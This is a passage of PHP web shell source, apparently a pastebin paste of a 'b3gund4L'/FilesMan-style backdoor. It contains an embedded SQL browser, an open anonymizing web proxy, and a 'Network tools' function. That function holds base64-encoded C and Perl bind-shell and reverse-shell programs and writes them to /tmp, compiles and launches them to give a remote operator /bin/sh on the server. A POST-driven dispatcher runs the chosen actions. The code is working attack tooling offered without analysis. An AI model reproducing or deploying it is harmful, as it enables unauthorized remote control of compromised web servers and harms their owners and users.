  1667.         .'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
  1668.     echo '</div>';
  1669.     hardFooter();
  1670. }
  1671. /* (?) 01.2020 Jakub Vr�na */
  1672. function actionSql() {
  1673.     hardHeader();
  1674.    
  1675.     $adminer_url = 'adminer.php';
  1676.     $adminer_functions = 'functions.js';
  1677.     $adminer_editing = 'editing.js';
  1678.  
  1679.     echo"<script>window.onload=function() {document.getElementById('ifr').style.height=window.innerHeight+'px';}
  1680.     </script>";
  1681.     if (file_exists($adminer_functions)) {
  1682.         if (file_exists($adminer_editing)) {
  1683.         } else {
  1684.             echo "<h1>Results</h1><div class=content><div><span>Warning: </span>" .$GLOBALS['home_cwd']. "/$adminer_editing file does not exist </div></div>";
  1685.         }
  1686.     } else {
  1687.         if (file_exists($adminer_editing)) {
  1688.             echo "<h1>Results</h1><div class=content><div><span>Warning: </span>" .$GLOBALS['home_cwd']. "/$adminer_functions file does not exist </div></div>";
  1689.         } else {
  1690.             echo "<h1>Results</h1><div class=content><div><span>Warning: </span>" .$GLOBALS['home_cwd']. "/$adminer_functions and ".$GLOBALS['home_cwd']. "/$adminer_editing  files does not exist </div></div>";
  1691.         }
  1692.     }
  1693.    
  1694.     if (file_exists($adminer_url)) {
  1695.         echo "<h1>Sql browser</h1><div class=content><iframe id='ifr' src='$adminer_url' width=100% height=auto scrolling=auto frameborder=0 style='border:none !important;'></iframe></div>";
  1696.     } else {
  1697.         echo "<h1>Not found</h1><div class=content><div align='center' ><h5>" .$GLOBALS['home_cwd']. "/$adminer_url</h5> file does not exist</div></div>";
  1698.         hardFooter();
  1699.     };
  1700. }
  1701. /* (?) 02.2019 Abdul Ahad */
  1702. function actionAnonymizer() {
  1703.     $whitelistPatterns = array();
  1704.     //To enable CORS (cross-origin resource sharing) for proxied sites, set $forceCORS to true.
  1705.     $forceCORS = false;
  1706.     //Set to false to report the client machine's IP address to proxied sites via the HTTP `x-forwarded-for` header.
  1707.     //Setting to false may improve compatibility with some sites, but also exposes more information about end users to proxied sites.
  1708.     $anonymize = true;
  1709.     //Start/default URL that that will be proxied when Proxy is first loaded in a browser/accessed directly with no URL to proxy.
  1710.     //If empty, Proxy will show its own landing page.
  1711.     $startURL = "";
  1712.     $landingExampleURL = "https://example.net";
  1713.    
  1714.     ob_start("ob_gzhandler");
  1715.     if (version_compare(PHP_VERSION, "5.4.7", "<")) {
  1716.         die("Proxy requires PHP version 5.4.7 or later.");
  1717.     }
  1718.     $requiredExtensions = ['curl', 'mbstring', 'xml'];
  1719.     foreach($requiredExtensions as $requiredExtension) {
  1720.         if (!extension_loaded($requiredExtension)) {
  1721.         die("Proxy requires PHP's \"" . $requiredExtension . "\" extension. Please install/enable it on your server and try again.");
  1722.         }
  1723.     }
  1724.     function getHostnamePattern($hostname) {
  1725.         $escapedHostname = str_replace(".", "\.", $hostname);
  1726.         return "@^https?://([a-z0-9-]+\.)*" . $escapedHostname . "@i";
  1727.     }
  1728.     function removeKeys(&$assoc, $keys2remove) {
  1729.         $keys = array_keys($assoc);
  1730.         $map = array();
  1731.         $removedKeys = array();
  1732.         foreach ($keys as $key) {
  1733.         $map[strtolower($key)] = $key;
  1734.         }
  1735.         foreach ($keys2remove as $key) {
  1736.         $key = strtolower($key);
  1737.         if (isset($map[$key])) {
  1738.             unset($assoc[$map[$key]]);
  1739.             $removedKeys[] = $map[$key];
  1740.         }
  1741.         }
  1742.         return $removedKeys;
  1743.     }
  1744.    
  1745.     if (!function_exists("getallheaders")) {
  1746.         function getallheaders() {
  1747.         $result = array();
  1748.         foreach($_SERVER as $key => $value) {
  1749.             if (substr($key, 0, 5) == "HTTP_") {
  1750.             $key = str_replace(" ", "-", ucwords(strtolower(str_replace("_", " ", substr($key, 5)))));
  1751.             $result[$key] = $value;
  1752.             }
  1753.         }
  1754.         return $result;
  1755.         }
  1756.     }
  1757.     $usingDefaultPort =  (!isset($_SERVER["HTTPS"]) && $_SERVER["SERVER_PORT"] === 80) || (isset($_SERVER["HTTPS"]) && $_SERVER["SERVER_PORT"] === 443);
  1758.     $prefixPort = $usingDefaultPort ? "" : ":" . $_SERVER["SERVER_PORT"];
  1759.     $prefixHost = $_SERVER["HTTP_HOST"];
  1760.     $prefixHost = strpos($prefixHost, ":") ? implode(":", explode(":", $_SERVER["HTTP_HOST"], -1)) : $prefixHost;
  1761.     define("PROXY_PREFIX", "http" . (isset($_SERVER["HTTPS"]) ? "s" : "") . "://" . $prefixHost . $prefixPort . $_SERVER["SCRIPT_NAME"] . "?");
  1762.     function makeRequest($url) {
  1763.         global $anonymize;
  1764.     $user_agent = $_SERVER["HTTP_USER_AGENT"];
  1765.         if (empty($user_agent)) {
  1766.         $user_agent = "Mozilla/5.0 (compatible; Proxy)";
  1767.         }
  1768.         $ch = curl_init();
  1769.         curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
  1770.         $browserRequestHeaders = getallheaders();
  1771.         $removedHeaders = removeKeys($browserRequestHeaders, array(
  1772.         "Accept-Encoding", //Throw away the browser's Accept-Encoding header if any and let cURL make the request using gzip if possible.
  1773.         "Content-Length",
  1774.         "Host",
  1775.         "Origin"
  1776.         ));  
  1777.         array_change_key_case($removedHeaders, CASE_LOWER);
  1778.         curl_setopt($ch, CURLOPT_ENCODING, "");
  1779.         $curlRequestHeaders = array();
  1780.         foreach ($browserRequestHeaders as $name => $value) {
  1781.         $curlRequestHeaders[] = $name . ": " . $value;
  1782.         }
  1783.         if (!$anonymize) {
  1784.         $curlRequestHeaders[] = "X-Forwarded-For: " . $_SERVER["REMOTE_ADDR"];
  1785.         }
  1786.         if (array_key_exists('origin', $removedHeaders)) {
  1787.         $urlParts = parse_url($url);
  1788.         $port = $urlParts['port'];
  1789.         $curlRequestHeaders[] = "Origin: " . $urlParts['scheme'] . "://" . $urlParts['host'] . (empty($port) ? "" : ":" . $port);
  1790.         };
  1791.         curl_setopt($ch, CURLOPT_HTTPHEADER, $curlRequestHeaders);
  1792.         switch ($_SERVER["REQUEST_METHOD"]) {
  1793.         case "POST":
  1794.             curl_setopt($ch, CURLOPT_POST, true);
  1795.             $postData = Array();
  1796.             parse_str(file_get_contents("php://input"), $postData);
  1797.             if (isset($postData["ProxyFormAction"])) {
  1798.             unset($postData["ProxyFormAction"]);
  1799.             }
  1800.             curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
  1801.         break;
  1802.         case "PUT":
  1803.             curl_setopt($ch, CURLOPT_PUT, true);
  1804.             curl_setopt($ch, CURLOPT_INFILE, fopen("php://input", "r"));
  1805.         break;
  1806.         }
  1807.         curl_setopt($ch, CURLOPT_HEADER, true);
  1808.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1809.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1810.         curl_setopt($ch, CURLOPT_URL, $url);
  1811.         $response = curl_exec($ch);
  1812.         $responseInfo = curl_getinfo($ch);
  1813.         $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
  1814.         curl_close($ch);
  1815.         $responseHeaders = substr($response, 0, $headerSize);
  1816.         $responseBody = substr($response, $headerSize);
  1817.         return array("headers" => $responseHeaders, "body" => $responseBody, "responseInfo" => $responseInfo);
  1818.     }
  1819.     function rel2abs($rel, $base) {
  1820.         if (empty($rel)) $rel = ".";
  1821.         if (parse_url($rel, PHP_URL_SCHEME) != "" || strpos($rel, "//") === 0) return $rel; //Return if already an absolute URL
  1822.         if ($rel[0] == "#" || $rel[0] == "?") return $base.$rel; //Queries and anchors
  1823.         extract(parse_url($base)); //Parse base URL and convert to local variables: $scheme, $host, $path
  1824.         $path = isset($path) ? preg_replace("#/[^/]*$#", "", $path) : "/"; //Remove non-directory element from path
  1825.         if ($rel[0] == "/") $path = ""; //Destroy path if relative url points to root
  1826.         $port = isset($port) && $port != 80 ? ":" . $port : "";
  1827.         $auth = "";
  1828.         if (isset($user)) {
  1829.         $auth = $user;
  1830.         if (isset($pass)) {
  1831.             $auth .= ":" . $pass;
  1832.         }
  1833.         $auth .= "@";
  1834.         }
  1835.         $abs = "$auth$host$port$path/$rel"; //Dirty absolute URL
  1836.         for ($n = 1; $n > 0; $abs = preg_replace(array("#(/\.?/)#", "#/(?!\.\.)[^/]+/\.\./#"), "/", $abs, -1, $n)) {} //Replace '//' or '/./' or '/foo/../' with '/'
  1837.         return $scheme . "://" . $abs; //Absolute URL is ready.
  1838.     }
  1839.     function proxifyCSS($css, $baseURL) {
  1840.         $sourceLines = explode("\n", $css);
  1841.         $normalizedLines = [];
  1842.         foreach ($sourceLines as $line) {
  1843.         if (preg_match("/@import\s+url/i", $line)) {
  1844.             $normalizedLines[] = $line;
  1845.         } else {
  1846.             $normalizedLines[] = preg_replace_callback(
  1847.             "/(@import\s+)([^;\s]+)([\s;])/i",
  1848.             function($matches) use ($baseURL) {
  1849.                 return $matches[1] . "url(" . $matches[2] . ")" . $matches[3];
  1850.             },
  1851.             $line);
  1852.         }
  1853.         }
  1854.         $normalizedCSS = implode("\n", $normalizedLines);
  1855.         return preg_replace_callback(
  1856.         "/url\((.*?)\)/i",
  1857.         function($matches) use ($baseURL) {
  1858.             $url = $matches[1];
  1859.             if (strpos($url, "'") === 0) {
  1860.                 $url = trim($url, "'");
  1861.             }
  1862.             if (strpos($url, "\"") === 0) {
  1863.                 $url = trim($url, "\"");
  1864.             }
  1865.             if (stripos($url, "data:") === 0) return "url(" . $url . ")"; //The URL isn't an HTTP URL but is actual binary data. Don't proxify it.
  1866.             return "url(" . PROXY_PREFIX . rel2abs($url, $baseURL) . ")";
  1867.         },
  1868.         $normalizedCSS);
  1869.     }
  1870.     function proxifySrcset($srcset, $baseURL) {
  1871.         $sources = array_map("trim", explode(",", $srcset)); //Split all contents by comma and trim each value
  1872.         $proxifiedSources = array_map(function($source) use ($baseURL) {
  1873.         $components = array_map("trim", str_split($source, strrpos($source, " "))); //Split by last space and trim
  1874.         $components[0] = PROXY_PREFIX . rel2abs(ltrim($components[0], "/"), $baseURL); //First component of the split source string should be an image URL; proxify it
  1875.         return implode($components, " "); //Recombine the components into a single source
  1876.         }, $sources);
  1877.         $proxifiedSrcset = implode(", ", $proxifiedSources); //Recombine the sources into a single "srcset"
  1878.         return $proxifiedSrcset;
  1879.     }
  1880.     if (isset($_POST["ProxyFormAction"])) {
  1881.         $url = $_POST["ProxyFormAction"];
  1882.         unset($_POST["ProxyFormAction"]);
  1883.     } else {
  1884.         $queryParams = Array();
  1885.         parse_str($_SERVER["QUERY_STRING"], $queryParams);
  1886.         if (isset($queryParams["ProxyFormAction"])) {
  1887.         $formAction = $queryParams["ProxyFormAction"];
  1888.         unset($queryParams["ProxyFormAction"]);
  1889.         $url = $formAction . "?" . http_build_query($queryParams);
  1890.         } else {
  1891.         $url = substr($_SERVER["REQUEST_URI"], strlen($_SERVER["SCRIPT_NAME"]) + 1);
  1892.         }
  1893.     }
  1894.     if (empty($url)) {
  1895.         if (empty($startURL)) {
  1896.             hardHeader();
  1897.             echo "<h1>b3gund4L</h1><div class=content>Proxy can be directly invoked like this: <a href=\"" . PROXY_PREFIX . $landingExampleURL . "\" target='_blank'>" . PROXY_PREFIX . $landingExampleURL . "</a><br /><br />Or, you can simply enter a URL below:<br /><br /><form onsubmit=\"if (document.getElementById('site').value) {
  1898.                 window.open('" . PROXY_PREFIX . "' + document.getElementById('site').value); return false; } else {
  1899.                 window.open('" . PROXY_PREFIX . $landingExampleURL . "'); return false; }\" autocomplete=\"off\"><input id=\"site\" type=\"text\" size=\"50\" autofocus /><input type=\"submit\" value=\"GO!\" /></form></div>";
  1900.             hardFooter();
  1901.             die();
  1902.         } else {
  1903.             $url = $startURL;
  1904.         }
  1905.     } else if (strpos($url, ":/") !== strpos($url, "://")) {
  1906.         //Work around the fact that some web servers (e.g. IIS 8.5) change double slashes appearing in the URL to a single slash.
  1907.         $pos = strpos($url, ":/");
  1908.         $url = substr_replace($url, "://", $pos, strlen(":/"));
  1909.     }
  1910.     $scheme = parse_url($url, PHP_URL_SCHEME);
  1911.     if (empty($scheme)) {
  1912.         //Assume that any supplied URLs starting with // are HTTP URLs.
  1913.         if (strpos($url, "//") === 0) {
  1914.         $url = "http:" . $url;
  1915.         }
  1916.     } else if (!preg_match("/^https?$/i", $scheme)) {
  1917.         die('Error: Detected a "' . $scheme . '" URL. Proxy exclusively supports http[s] URLs.');
  1918.     }
  1919.     $urlIsValid = count($whitelistPatterns) === 0;
  1920.     foreach ($whitelistPatterns as $pattern) {
  1921.         if (preg_match($pattern, $url)) {
  1922.         $urlIsValid = true;
  1923.         break;
  1924.         }
  1925.     }
  1926.     if (!$urlIsValid) {
  1927.         die("Error: The requested URL was disallowed by the server adFc7strator.");
  1928.     }
  1929.    
  1930.     $response = makeRequest($url);
  1931.     $rawResponseHeaders = $response["headers"];
  1932.     $responseBody = $response["body"];
  1933.     $responseInfo = $response["responseInfo"];
  1934.     $responseURL = $responseInfo["url"];
  1935.     if ($responseURL !== $url) {
  1936.         header("Location: " . PROXY_PREFIX . $responseURL, true);
  1937.         exit(0);
  1938.     }
  1939.     $header_blacklist_pattern = "/^Content-Length|^Transfer-Encoding|^Content-Encoding.*gzip/i";
  1940.     $responseHeaderBlocks = array_filter(explode("\r\n\r\n", $rawResponseHeaders));
  1941.     $lastHeaderBlock = end($responseHeaderBlocks);
  1942.     $headerLines = explode("\r\n", $lastHeaderBlock);
  1943.     foreach ($headerLines as $header) {
  1944.         $header = trim($header);
  1945.         if (!preg_match($header_blacklist_pattern, $header)) {
  1946.         header($header, false);
  1947.         }
  1948.     }
  1949.     header("X-Robots-Tag: noindex, nofollow", true);
  1950.    
  1951.     if ($forceCORS) {
  1952.         header("Access-Control-Allow-Origin: *", true);
  1953.         header("Access-Control-Allow-Credentials: true", true);
  1954.    
  1955.         if ($_SERVER["REQUEST_METHOD"] == "OPTIONS") {
  1956.         if (isset($_SERVER["HTTP_ACCESS_CONTROL_REQUEST_METHOD"])) {
  1957.             header("Access-Control-Allow-Methods: GET, POST, OPTIONS", true);
  1958.         }
  1959.         if (isset($_SERVER["HTTP_ACCESS_CONTROL_REQUEST_HEADERS"])) {
  1960.             header("Access-Control-Allow-Headers: {$_SERVER['HTTP_ACCESS_CONTROL_REQUEST_HEADERS']}", true);
  1961.         }
  1962.         exit(0);
  1963.         }
  1964.    
  1965.     }
  1966.    
  1967.     $contentType = "";
  1968.     if (isset($responseInfo["content_type"])) $contentType = $responseInfo["content_type"];
  1969.    
  1970.     if (stripos($contentType, "text/html") !== false) {
  1971.    
  1972.         $detectedEncoding = mb_detect_encoding($responseBody, "UTF-8, ISO-8859-1");
  1973.         if ($detectedEncoding) {
  1974.         $responseBody = mb_convert_encoding($responseBody, "HTML-ENTITIES", $detectedEncoding);
  1975.         }
  1976.         $doc = new DomDocument();
  1977.         @$doc->loadHTML($responseBody);
  1978.         $xpath = new DOMXPath($doc);
  1979.    
  1980.         //Rewrite forms so that their actions point back to the proxy.
  1981.         foreach($xpath->query("//form") as $form) {
  1982.         $method = $form->getAttribute("method");
  1983.         $action = $form->getAttribute("action");
  1984.         $action = empty($action) ? $url : rel2abs($action, $url);
  1985.         $form->setAttribute("action", rtrim(PROXY_PREFIX, "?"));
  1986.         $actionInput = $doc->createDocumentFragment();
  1987.         $actionInput->appendXML('<input type="hidden" name="ProxyFormAction" value="' . htmlspecialchars($action) . '" />');
  1988.         $form->appendChild($actionInput);
  1989.         }
  1990.         foreach ($xpath->query("//meta[@http-equiv]") as $element) {
  1991.         if (strcasecmp($element->getAttribute("http-equiv"), "refresh") === 0) {
  1992.             $content = $element->getAttribute("content");
  1993.             if (!empty($content)) {
  1994.             $splitContent = preg_split("/=/", $content);
  1995.             if (isset($splitContent[1])) {
  1996.                 $element->setAttribute("content", $splitContent[0] . "=" . PROXY_PREFIX . rel2abs($splitContent[1], $url));
  1997.             }
  1998.             }
  1999.         }
  2000.         }
  2001.         foreach($xpath->query("//style") as $style) {
  2002.         $style->nodeValue = proxifyCSS($style->nodeValue, $url);
  2003.         }
  2004.         foreach ($xpath->query("//*[@style]") as $element) {
  2005.         $element->setAttribute("style", proxifyCSS($element->getAttribute("style"), $url));
  2006.         }
  2007.         foreach ($xpath->query("//img[@srcset]") as $element) {
  2008.         $element->setAttribute("srcset", proxifySrcset($element->getAttribute("srcset"), $url));
  2009.         }
  2010.         $proxifyAttributes = array("href", "src");
  2011.         foreach($proxifyAttributes as $attrName) {
  2012.         foreach($xpath->query("//*[@" . $attrName . "]") as $element) { //For every element with the given attribute...
  2013.             $attrContent = $element->getAttribute($attrName);
  2014.             if ($attrName == "href" && preg_match("/^(about|javascript|magnet|mailto):|#/i", $attrContent)) continue;
  2015.             if ($attrName == "src" && preg_match("/^(data):/i", $attrContent)) continue;
  2016.             $attrContent = rel2abs($attrContent, $url);
  2017.             $attrContent = PROXY_PREFIX . $attrContent;
  2018.             $element->setAttribute($attrName, $attrContent);
  2019.         }
  2020.         }
  2021.         $head = $xpath->query("//head")->item(0);
  2022.         $body = $xpath->query("//body")->item(0);
  2023.         $prependElem = $head != NULL ? $head : $body;
  2024.         if ($prependElem != NULL) {
  2025.    
  2026.         $scriptElem = $doc->createElement("script",
  2027.             '(function() {
  2028.    
  2029.             if (window.XMLHttpRequest) {
  2030.    
  2031.                 function parseURI(url) {
  2032.                 var m = String(url).replace(/^\s+|\s+$/g, "").match(/^([^:\/?#]+:)?(\/\/(?:[^:@]*(?::[^:@]*)?@)?(([^:\/?#]*)(?::(\d*))?))?([^?#]*)(\?[^#]*)?(#[\s\S]*)?/);
  2033.                 // authority = "//" + user + ":" + pass "@" + hostname + ":" port
  2034.                 return (m ? {
  2035.                     href : m[0] || "",
  2036.                     protocol : m[1] || "",
  2037.                     authority: m[2] || "",
  2038.                     host : m[3] || "",
  2039.                     hostname : m[4] || "",
  2040.                     port : m[5] || "",
  2041.                     pathname : m[6] || "",
  2042.                     search : m[7] || "",
  2043.                     hash : m[8] || ""
  2044.                 } : null);
  2045.                 }
  2046.    
  2047.                 function rel2abs(base, href) { // RFC 3986
  2048.    
  2049.                 function removeDotSegments(input) {
  2050.                     var output = [];
  2051.                     input.replace(/^(\.\.?(\/|$))+/, "")
  2052.                     .replace(/\/(\.(\/|$))+/g, "/")
  2053.                     .replace(/\/\.\.$/, "/../")
  2054.                     .replace(/\/?[^\/]*/g, function (p) {
  2055.                         if (p === "/..") {
  2056.                         output.pop();
  2057.                         } else {
  2058.                         output.push(p);
  2059.                         }
  2060.                     });
  2061.                     return output.join("").replace(/^\//, input.charAt(0) === "/" ? "/" : "");
  2062.                 }
  2063.    
  2064.                 href = parseURI(href || "");
  2065.                 base = parseURI(base || "");
  2066.    
  2067.                 return !href || !base ? null : (href.protocol || base.protocol) +
  2068.                 (href.protocol || href.authority ? href.authority : base.authority) +
  2069.                 removeDotSegments(href.protocol || href.authority || href.pathname.charAt(0) === "/" ? href.pathname : (href.pathname ? ((base.authority && !base.pathname ? "/" : "") + base.pathname.slice(0, base.pathname.lastIndexOf("/") + 1) + href.pathname) : base.pathname)) +
  2070.                 (href.protocol || href.authority || href.pathname ? href.search : (href.search || base.search)) +
  2071.                 href.hash;
  2072.    
  2073.                 }
  2074.    
  2075.                 var proxied = window.XMLHttpRequest.prototype.open;
  2076.                 window.XMLHttpRequest.prototype.open = function() {
  2077.                     if (arguments[1] !== null && arguments[1] !== undefined) {
  2078.                     var url = arguments[1];
  2079.                     url = rel2abs("' . $url . '", url);
  2080.                     url = "' . PROXY_PREFIX . '" + url;
  2081.                     arguments[1] = url;
  2082.                     }
  2083.                     return proxied.apply(this, [].slice.call(arguments));
  2084.                 };
  2085.    
  2086.             }
  2087.    
  2088.             })();'
  2089.         );
  2090.         $scriptElem->setAttribute("type", "text/javascript");
  2091.    
  2092.         $prependElem->insertBefore($scriptElem, $prependElem->firstChild);
  2093.    
  2094.         }
  2095.    
  2096.         echo "<!-- Proxified page constructed by Proxy -->\n" . $doc->saveHTML();
  2097.     } else if (stripos($contentType, "text/css") !== false) { //This is CSS, so proxify url() references.
  2098.         echo proxifyCSS($responseBody, $url);
  2099.     } else { //This isn't a web page or CSS, so serve unmodified through the proxy with the correct headers (images, JavaScript, etc.)
  2100.         header("Content-Length: " . strlen($responseBody), true);
  2101.         echo $responseBody;
  2102.     }
  2103. }
  2104. function actionNetwork() {
  2105.     hardHeader();
  2106.     $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
  2107.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2108.     $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
  2109.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2110.     echo "<h1>Network tools</h1><div class=content>
  2111.     <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
  2112.     <span>Bind port to /bin/sh</span><br/>
  2113.     Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
  2114.     </form>
  2115.     <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
  2116.     <span>Back-connect to</span><br/>
  2117.     Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
  2118.     </form><br>";
  2119.     if(isset($_POST['p1'])) {
  2120.         function cf($f,$t) {
  2121.             $w=@fopen($f,"w") or @function_exists('file_put_contents');
  2122.             if($w)  {
  2123.                 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
  2124.                 @fclose($w);
  2125.             }
  2126.         }
  2127.         if($_POST['p1'] == 'bpc') {
  2128.             cf("/tmp/bp.c",$bind_port_c);
  2129.             $apple = ex("gcc -o /tmp/bp /tmp/bp.c");
  2130.             @unlink("/tmp/bp.c");
  2131.             $apple .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
  2132.             echo "<pre class=ml1>$apple".ex("ps aux | grep bp")."</pre>";
  2133.         }
  2134.         if($_POST['p1'] == 'bpp') {
  2135.             cf("/tmp/bp.pl",$bind_port_p);
  2136.             $apple = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
  2137.             echo "<pre class=ml1>$apple".ex("ps aux | grep bp.pl")."</pre>";
  2138.         }
  2139.         if($_POST['p1'] == 'bcc') {
  2140.             cf("/tmp/bc.c",$back_connect_c);
  2141.             $apple = ex("gcc -o /tmp/bc /tmp/bc.c");
  2142.             @unlink("/tmp/bc.c");
  2143.             $apple .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
  2144.             echo "<pre class=ml1>$apple".ex("ps aux | grep bc")."</pre>";
  2145.         }
  2146.         if($_POST['p1'] == 'bcp') {
  2147.             cf("/tmp/bc.pl",$back_connect_p);
  2148.             $apple = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
  2149.             echo "<pre class=ml1>$apple".ex("ps aux | grep bc.pl")."</pre>";
  2150.         }
  2151.     }
  2152.     echo '</div>';
  2153.     hardFooter();
  2154. }
  2155. if( empty($_POST['a']) )
  2156.     if(isset($_action) && function_exists('action' . $_action))
  2157.         $_POST['a'] = $_action;
  2158.     else
  2159.         $_POST['a'] = 'FilesMan';
  2160. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
  2161.     call_user_func('action' . $_POST['a']);
  2162. ?>
Add Comment
Please, Sign In to add comment